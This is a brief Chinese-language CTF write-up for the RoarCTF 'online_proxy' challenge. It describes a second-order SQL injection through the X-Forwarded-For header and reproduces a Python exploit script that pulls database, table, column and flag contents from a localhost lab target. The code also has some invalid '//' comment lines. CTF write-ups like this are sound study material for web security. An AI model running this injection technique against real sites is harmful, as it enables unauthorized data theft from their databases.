0x00 知識點
XFF頭注入
0x01 解題
打開題目查看源代碼,看到客戶端IP,猜測是把客戶端的IP地址記錄到數據庫當中。
經過測試X-Forwarded-For修改后回顯不同,找到注入點
貼腳本:
https://github.com/berTrAM888/RoarCTF-Writeup-some-Source-Code/blob/master/Web/online_proxy/writeup/Exp.py
#!/usr/bin/env python3
import requests
target = "http://localhost:8302/"
def execute_sql(sql):
print("[*]請求語句:" + sql)
return_result = ""
payload = "0'|length((" + sql + "))|'0"
session = requests.session()
r = session.get(target, headers={'X-Forwarded-For': payload})
r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})
r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})
start_pos = r.text.find("Last Ip: ")
end_pos = r.text.find(" -->", start_pos)
length = int(r.text[start_pos + 9: end_pos])
print("[+]長度:" + str(length))
for i in range(1, length + 1, 5):
payload = "0'|conv(hex(substr((" + sql + ")," + str(i) + ",5)),16,10)|'0"
r = session.get(target, headers={'X-Forwarded-For': payload}) # 將語句注入
r = session.get(target, headers={'X-Forwarded-For': 'glzjin'}) # 查詢上次IP時觸發二次注入
r = session.get(target, headers={'X-Forwarded-For': 'glzjin'}) # 再次查詢得到結果
start_pos = r.text.find("Last Ip: ")
end_pos = r.text.find(" -->", start_pos)
result = int(r.text[start_pos + 9: end_pos])
return_result += bytes.fromhex(hex(result)[2:]).decode('utf-8')
print("[+]位置 " + str(i) + " 請求五位成功:" + bytes.fromhex(hex(result)[2:]).decode('utf-8'))
return return_result
//獲取數據庫
print("[+]獲取成功:" + execute_sql("SELECT group_concat(SCHEMA_NAME) FROM information_schema.SCHEMATA"))
// 獲取數據庫表
print("[+]獲取成功:" + execute_sql("SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e'"))
//獲取數據庫表
print("[+]獲取成功:" + execute_sql("SELECT group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e' AND TABLE_NAME = 'F4l9_t4b1e' "))
// 獲取表中內容
print("[+]獲取成功:" + execute_sql("SELECT group_concat(F4l9_C01uMn) FROM F4l9_D4t4B45e.F4l9_t4b1e"))
